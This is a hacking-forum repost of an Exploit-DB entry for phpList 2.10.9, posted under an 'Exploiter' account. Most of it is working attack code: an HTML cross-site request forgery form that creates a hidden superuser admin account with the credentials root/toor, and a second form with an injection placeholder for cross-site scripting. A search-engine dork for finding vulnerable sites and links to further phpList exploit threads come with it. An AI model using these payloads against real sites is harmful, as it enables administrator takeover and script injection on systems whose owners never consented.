Exploit phpList 2.10.9 - Cross-Site Request Forgery / Cross-Site Scripting

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
18419
Проверка EDB
  1. Пройдено
Автор
CYBER-CRYSTAL
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2012-5228 cve-2012-4247 cve-2012-4246 cve-2011-1682 cve-2011-0748
Дата публикации
2012-01-26
HTML: 
+-------------------------------------------------------------------------+
# Exploit Title : phplist - version 2.10.9 CSRF/XSS Vulnerability
# version       : 2.10.9                                                                                                                           
# Author        : Cyber-Crystal                                              
# Date          : n/a   
# Dork          : inurl:"powered by phplist - version 2.10.9"
# Software Link : http://www.phplist.com/                                                                                  
+-------------------------------------------------------------------------+

+---+[CSRF Add Admin Acuonnt by Cyber-Crystal]+---+
<html>
<title>[#] Exploit [#]</title>
<body>
<form method="POST" name="form2" action="http://localhost/lists/admin/?page=admin&start=">
<input type="hidden" name="id" value="0"/>
<input type="hidden" name="loginname" value="root"/>
<input type="hidden" name="email" value="ss@ss.com"/>
<input type="hidden" name="password" value="toor"/>
<input type="hidden" name="superuser" value="1"/>
<input type="hidden" name="disabled" value=""/>
<input type="hidden" name="cbattribute[]" value="1"/>
<input type="hidden" name="attribute[1]" value="Checked"/>
<input type="hidden" name="change" value="Save Changes"/>

<input type="submit" value="exploit" />
</form>
</body>
</html>

+---+[XSS Send post ]+---+
<html>
<title>[#] Exploit [#]</title>
<body>
<form method=post action="http://localhost/lists/admin/?page=send&id=1&tab=Format" name="sendmessageform">
<input type=hidden name="workaround_fck_bug" value="1">
<input type=hidden name="htmlformatted" value="auto">
<input type=submit name=sendtest value="Exploit">
<input type=text name="testtarget" size=40 value='[XSS HERE]'>
<input type=hidden name=id value=7>
<input type=hidden name=status value="draft">
<input type=hidden name=expand value="0">
</form>
</body>
</html>

#-----------------------------------#
|  by Cyber-Crystal 			    |
|  								    |
|  Mail : Cyb3r.Crystal@Gmail.com   |
|  Home // www.v4-team.com/cc		|
|     						        |
#-----------------------------------#
Greetz 2 : Secure-x41 | Fox Hacker | Or4nG.M4n | SadHacker | Mr.Black | Red Virus | aBu.HaLiL501 | T7 | Sniper_IRaq || # All Man 0_0



# the End
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit phpList 2.10.18 - 'unconfirmed' Cross-Site Scripting
Ответы
0
Просмотры
588
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpList 2.10.2 - 'index.php' Cross-Site Scripting
Ответы
0
Просмотры
501
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpList 2.10.17 - SQL Injection / Cross-Site Scripting
Ответы
0
Просмотры
520
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpList 2.10.x - 'email' Cross-Site Scripting
Ответы
0
Просмотры
513
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit WordPress Plugin WP-phpList 2.10.2 - 'unsubscribeemail' Cross-Site Scripting
Ответы
0
Просмотры
469
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHPList Mailing List Manager 2.x - '/admin/users.php?find' Cross-Site Scripting
Ответы
0
Просмотры
490
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHPList Mailing List Manager 2.x - '/admin/configure.php?id' Cross-Site Scripting
Ответы
0
Просмотры
470
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit PHPList Mailing List Manager 2.x - '/admin/eventlog.php' Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
472
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpList 2.10.18 - 'index.php' SQL Injection
Ответы
0
Просмотры
567
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit phpList 2.10.9 - 'Sajax.php' PHP Code Injection
Ответы
0
Просмотры
587
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу